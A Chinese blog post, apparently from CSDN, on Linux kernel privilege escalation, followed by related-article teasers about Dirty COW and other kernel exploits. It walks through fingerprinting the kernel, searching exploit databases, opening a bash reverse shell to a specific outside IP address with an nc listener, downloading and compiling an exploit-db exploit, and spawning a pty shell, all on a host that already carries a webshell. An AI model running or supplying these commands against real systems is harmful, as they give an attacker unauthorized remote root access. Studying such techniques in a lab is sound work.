Linux提权学习

最新推荐文章于 2023-10-08 22:23:53 发布
最新推荐文章于 2023-10-08 22:23:53 发布
阅读量309 收藏
点赞数

系统漏洞提权

1、获取操作系统版本号

2、根据版本号搜索exp

3、反弹shell

4、尝试利用

1、获取系统版本号:

获取发行版本

 
 
• cat /etc/issue• cat /etc/*-release• cat /etc/lsb-release• cat /etc/redhat-release

cat /etc/*-release

cat /etc/lsb-release

cat /etc/redhat-release
 
 
获取内核版本
 
 
 
 
• cat /proc/version• uname -a• uname -mrs• rpm -q kernel• dmesg | grep Linux• ls /boot | grep vmlinuzversion

• uname -a

• uname -mrs

• rpm -q kernel

• dmesg | grep Linux

ls /boot | grep vmlinuz
 
 
2、搜索exp获取内核版本
 
 
 
 
• http://www.exploit-db.com• http://1337day.com• http://www.securiteam.com• http://www.securityfocus.com• http://www.exploitsearch.net• http://metasploit.com/modules/• http://securityreason.com• http://seclists.org/fulldisclosure/• http://www.google.com//www.exploit-db.com

http://1337day.com

http://www.securiteam.com

http://www.securityfocus.com

http://www.exploitsearch.net

http://metasploit.com/modules/

http://securityreason.com

http://seclists.org/fulldisclosure/

http://www.google.com
 
 

 
 
3.反弹shell
 
 
自己主机使用nc监听端口
 
 
nc -l -p 8080
 
 
目标服务器运行
 
 
 
 
/bin/bash -i >& /dev/tcp/114.115.214.203/8888 0<&1
 
 
实例演示:
 
 
此时http://10.22.5.70/dahuiji.php 已经取得一个webshell
 
 

 
 
640?wx_fmt=png
 
 
640?wx_fmt=png
 
 
首先获取操作系统版本号
 
 
640?wx_fmt=png
 
 
640?wx_fmt=png
 
 
搜索exp
 
 
640?wx_fmt=png
 
 
640?wx_fmt=png
 
 

 
 
反弹shell
 
 
/bin/bash -i >& /dev/tcp/114.115.214.203/8888 0<&1
 
 

 
 
640?wx_fmt=png
 
 
640?wx_fmt=png
 
 
尝试利用exp
 
 
640?wx_fmt=png
 
 
curl https://www.exploit-db.com/download/35370 > exp.c
 
 

 
 
640?wx_fmt=png
 
 
gcc编译一下 exp.c 生成exp
 
 
gcc exp.c -o exp -lpthread
 
 

 
 
640?wx_fmt=png
 
 
640?wx_fmt=png
 
 
使用python -c ‘import pty; pty.spawn(“/bin/bash”)’ 增加交互的
 
 
python -c ‘import pty; pty.spawn(“/bin/bash”)’
 
 

 
 
效果
 
 
640?wx_fmt=png
 
 
 


                

        

        

    




    

      

        

            

              
                
                  Linux知识积累
                
              
            

            

                关注
              
            

        

        

          
    
            
  • 
              
                
                
                
                
                      0
                
              
              
    点赞
    
            
    • 
            
  • 
              
                
                
                
              
              
    
            
    • 
            
  • 
              
                
                
                
                
                    0
                
              
              
    
                
    
                  
                    收藏
                  
                
    
              
    
              
    
                
    
                  觉得还不错?
                  
                    一键收藏
                  
                 
                
    
              
    
            
    • 
          
  • 
            
    
              
              
            
    
              
              
              
                    0
              
            
            
    评论
    
          
    • 
          
  • 
          
    • 
          
  • 
            
              
            
              
    
            
              
                
            
    
          
    • 
        

      

      










                



	

		

			

				
					
Ubuntu内核提权(CVE-2017-16995)

				
			

			

				

					weixin_68652890的博客
				

				

					04-15
					
					752
					
				

			

		

		

			
				
内核提权
环境:
墨者靶场
工具
msf
linux-exploit-suggester-master
xshell
利用
xshell连接发现是hack权限
上传linux-exploit-suggester.sh到服务器
Possible Exploits:
  CVE-2017-16995
  CVE-2016-5195

CVE-2016-5195也可以利用
我们这里利用CVE-2017-16995进行提权
影响
CVE-2017-16995


Linux 

			
		

	



                

              
                



	

		

			

				
					
Linux提权

				
			

			

				

					weixin_44489066的博客
				

				

					01-29
					
					3401
					
				

			

		

		

			
				
系统漏洞提权总体思路:1、获取操作系统版本号;2、根据版本号搜索exp;3、反弹shell利用;4、尝试利用

1、获取系统版本号

获取发行版本


cat /etc/issue  (Debian,ubuntu系列)
cat /etc/*-release
cat /etc/lsb-release
cat /etc/redhat-release (红帽,centos系列)

获取内核版本


ca...

			
		

	



                


  
              

                


	

		

			

				
					
Ubuntu 本地内核提权 (CVE-2017-16995)

				
			

			

				

					震山的博客
				

				

					08-07
					
					1461
					
				

			

		

		

			
				
Ubuntu 本地提权再现

			
		

	





	

		

			

				
					
Ubuntu 16.04提权

				
			

			

				

					哦 卷!
				

				

					03-26
					
					1019
					
				

			

		

		

			
				
这里选用一个 4.4.x 相对通用的提权方式(Privilege Escalation表示提权)。文本写的是漏洞产生的原因、描述和漏洞利用的方法,还附上了exp,就是最后一行的链接。kali启动http服务,将exploit.tar文件复制到网站根目录。需要将exploit.tar上传到目标主机,并解压运行~在目标机器上使用wget进行下载。使用wget下载,出现404。文件中提到的使用方式进行操作。解压exploit.tar文件。已经获取到了root权限。📌实验环境:DC-3靶机。文件中的方式进行操作。

			
		

	



		

			
		



	

		

			

				
					
Ubuntu 10.10 提权教程

				
			

			

				

					02-10
				

			

		

		

			
				
Ubuntu 10.10 提权教程    告诉你Ubuntu应该怎么提权

			
		

	





	

		

			

				
					
Linux提权手法总结以及 Linux提权exp集合

				
			

			

				

					02-22
				

			

		

		

			
				
本文将深入探讨Linux提权的常见手法,以及如何防范和应对这些威胁。  首先,内核漏洞提权是最直接也最具破坏性的方式之一。当Linux内核存在安全漏洞时,攻击者可以利用这些漏洞执行恶意代码,从而获得root权限。例如...

			
		

	





	

		

			

				
					
dirtycow脏牛linux提权exp

				
			

			

				

					03-25
				

			

		

		

			
				
总的来说,"Dirty COW"是一个严重的Linux提权漏洞,对系统的安全性构成重大威胁。了解其工作原理、潜在风险以及防范措施,对于系统管理员和安全研究人员来说都是必不可少的知识。通过深入研究"dirtycow-master"中的...

			
		

	





	

		

			

				
					
linux内核自动提权脚本.zip

				
			

			

				

					02-01
				

			

		

		

			
				
这个压缩包文件"linux内核自动提权脚本.zip"包含了针对多种Linux内核版本的提权代码,能够自动化地检测系统环境并执行相应的提权操作。以下是对这一主题的详细解释:  1. **Linux内核**:Linux内核是操作系统的核心...

			
		

	





	

		

			

				
					
linux提权教程

				
			

			

				

					02-10
				

			

		

		

			
				
本教程将详细讲解Linux提权的相关知识点,帮助你理解并掌握这一核心技能。  一、权限系统概述 在Linux中,权限分为三种类型:读(r)、写(w)和执行(x),它们应用于文件和目录。用户有三种身份:用户(user)、组...

			
		

	





	

		

			

				
					
linux提权笔记.txt

					
最新发布

				
			

			

				

					01-09
				

			

		

		

			
				
Linux系统安全学习

			
		

	





	

		

			

				
					
ubuntu本地内核提权37292.c

				
			

			

				

					08-06
				

			

		

		

			
				
ubuntu本地内核提权

			
		

	





	

		

			

				
					
Ubuntu用户提权到Root

				
			

			

				

					skysys的研究小屋
				

				

					03-12
					
					3282
					
				

			

		

		

			
				
在shell里面输入  sudo vim /etc/passwd   将里面的当前用户的ID值进行修改。譬如我的当前用户是chenjieb
则找到了  chenjieb:x:1000:1000:Administrator,,,:/home.chenjieb:/bin/bash  将两个1000改成0即可。即最后改完的结果为:
chenjieb:x:0:0:Administrator,,,:/home.chenjieb:/bin/bash  最后将Ubuntu系统进行注销,然后在登陆的用户名里输入 你自己的用

			
		

	





	

		

			

				
					
【msf】对ubuntu系统进行提权

				
			

			

				

					qq_20410657的博客
				

				

					10-08
					
					762
					
				

			

		

		

			
				
查询内核漏洞


寻找内核漏洞-匹配
查找到内核漏洞的文件


使用gcc编译内核漏洞执行程序

上传漏洞执行程序到ubuntu系统


进行shell提权

提权失败
渗透总结

			
		

	





	

		

			

				
					
ubuntu 命令卡住_Ubuntu内核提权(CVE-2017-16995)漏洞的复现&脏牛漏洞

				
			

			

				

					weixin_39631344的博客
				

				

					10-22
					
					187
					
				

			

		

		

			
				
Ubuntu内核提权漏洞的复现这里先介绍一下漏洞,Ubuntu是一个以桌面应用为主的开源GNU/Linux操作系统,基于Debian GNU/Linux 。近期有白帽子爆出 ubuntu 的最新版本(Ubuntu 16.04)存在本地提权漏洞,漏洞编号为CVE-2017-16995。漏洞分享:Ubuntu本地提权(CVE-2017-16995)参考链接:https://blog.csdn.net/...

			
		

	





	

		

			

				
					
Ubuntu 内核存在多个提权漏洞,近40%的用户易受攻击

				
			

			

				

					smellycat000的专栏
				

				

					07-27
					
					515
					
				

			

		

		

			
				
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士Ubuntu 内核中存在两个 Linux 漏洞,可导致低权限的本地用户在大量设备上提权。Ubuntu 是使用最广泛的 Linux 发行版本之一,在美国尤为受欢迎,用户大约超过4000万名。近日,Wiz 公司的研究人员 S. Tzadik 和 S. Tamari 从该操作系统中发现了两个漏洞CVE-2023-32629和CVE-2023-2640,...

			
		

	





	

		

			

				
					
CVE-2021-3493:Overlay 文件系统 Ubuntu 本地提权漏洞分析

				
			

			

				

					个人笔记
				

				

					07-02
					
					1654
					
				

			

		

		

			
				
由于笔者已分析过 CVE-2023-0386,在此基础上,分析 CVE-2021-3493 可能更为简单。CVE-2023-0386 需要理解OverlayFS、Linux 命名空间、SetUID 位的概念;除此之外,如果你想理解 CVE-2021-3493,还需要了解Capability、Linux 文件扩展属性。当你理解了这些常见的概念之后,在手动复现这些漏洞,会有更加深刻的理解,并且可以提高对 Linux 本地提权漏洞的认知。

			
		

	





	

		

			

				
					
117.网络安全渗透测试—[权限提升篇15]—[Ubuntu15.04 Metasploit提权]

				
			

			

				

					qwsn
				

				

					07-08
					
					3654
					
				

			

		

		

			
				
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!!
       是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。php马:
elf马:#msfconsole,开启Metasploit控制台





如下图所示,我们首先上传shellx.php攻击载荷到靶机:


			
		

	





	

		

			

				
					
Ubuntu 16.04本地提权 复现问题

				
			

			

				

					CSDN_laogao的博客
				

				

					03-24
					
					709
					
				

			

		

		

			
				
你或许执行完编译好的文件后并不能提权,除了版本不对那基本上就是内核的问题了下面介绍如何更换成漏洞内核 4.14-4.4通杀0x01apt-cache search linux 找到有漏洞的内核版本并下载安装sudo apt-get install linux-headers-4.X.X-XX-generic linux-image-4.X.X-XX-generic找到一个合适的安装即可0x02修改...

			
		

	





	

		

			

				
					
生命在于学习——Linux提权

				
			

			

				

					易水哲的博客
				

				

					11-03
					
					1647
					
				

			

		

		

			
				
Linux提权学习笔记记录。

			
		

	





	

		

			

				
					
Linux提权攻略:从信息收集到内核漏洞利用

				
			

			

				

					
				

			

		

		

			
				
"这篇文档是关于Linux提权的深度指南,涵盖了多种权限提升技术,包括信息收集、内核漏洞利用、服务权限滥用等,并强调了权限升级在攻防中的重要性。作者提醒读者,该文仅供学习研究,禁止非法攻击。"  在Linux系统中...

			
		

	



              



  
“相关推荐”对你有帮助么?

  

      
    
          
  • 
              
    
                  
                  
              
    
              
    非常没帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    没帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    一般
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    有帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    非常有帮助
    
          
    • 
      

      

      

          
          提交
      

      

  




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值